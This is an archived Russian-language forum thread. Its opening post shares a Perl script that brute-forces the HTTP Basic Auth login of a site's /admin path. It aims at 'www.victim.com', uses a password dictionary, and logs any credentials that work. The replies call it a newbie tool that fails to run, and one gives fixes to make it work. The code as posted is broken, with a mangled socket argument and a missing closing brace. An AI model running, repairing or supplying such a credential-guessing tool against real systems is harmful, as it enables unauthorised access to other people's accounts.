PDA

Просмотр полной версии : Brute admin password [perl]


Звeрь
31.01.2009, 01:03
Brute admin password [perl]
тестил на себе работает :D

#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;
use POSIX;

$server="www.victim.com";### Адрес сервера
$port="80";
$dir="/admin";### путь к админке
$logfile="sucess.log";
$log="now.log";
$words="bigdict.txt";### список паролей
$user="admin";

open(file, "$words") or die print "$!\n";
@data=<file>;
$total=@data;
close file;

$i=0;
foreach $pass (@data) {
$i++;
chomp($pass);
open(file, ">$log") or die print "$!\n";
$perc=($i*100)/$total;
$perc=ceil($perc);
print file "$perc\% Done\t$i of $total\t\tNow: $user\:$pass\n"; ### Пишем в лог статус
close file;
$auth=encode_base64("$user\:$pass"); ### Создаем Mime-хеш
chomp($auth);
$socket=IO::Socket::INET->new( PeerAddr => $server,
PeerPort => $port,
Photo => tcp)
or die print "Unable to connect to $server:$port\n";
print $socket "GET $dir HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: http://support.microsoft.com/\n";
print $socket "User-Agent: Internet Explorer 6.0\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Authorization: Basic $auth\n";
print $socket "Connection: close\n\n";
$ans=<$socket>;
if ($ans=~/200 Ok/i) {
open(logf, ">>$logfile") or die print "$!\n";
print logf "$user:$pass is OK!!!\n";
close logf;
exit 0;

ртуть
31.01.2009, 01:08
такого шита в инете валом... для чего? как экземпел или типа my first elite tool?

#!/usr/bin/perl -ewT print "Hello world\n"; #e0f :confused:

bombeg
31.01.2009, 11:08
придумывают крипторы для кода... вон достаточно адептом перла стать.... и хер кто расшифрует.

DDoSька
31.01.2009, 16:12
Это надо было бы пихнуть в раздел "Скрипты от скуки", а так , это только для новичков, но тоже полезно

demond
02.02.2009, 11:22
Сырой скрипт! И без реализации прокси совершенно бесполезный. Хотя если тренироваться на себе... :-)

a1ex
02.02.2009, 11:28
Что-то Зверь часто баянить стал....или просто под типа своё переделывает...

Vlad3d
02.02.2009, 12:49
не работает вообще, даже не запускается

demond
02.02.2009, 13:01
Я и говорю что скрипт сырой. :-) просто хендлы файловые надо в верхнем регистре переписать и имя протокола в кавычках записать в 33ей строчке. и все будет работать.

PS Как ЭТО автор на себе тестил? На какой системе оно запустилось? :D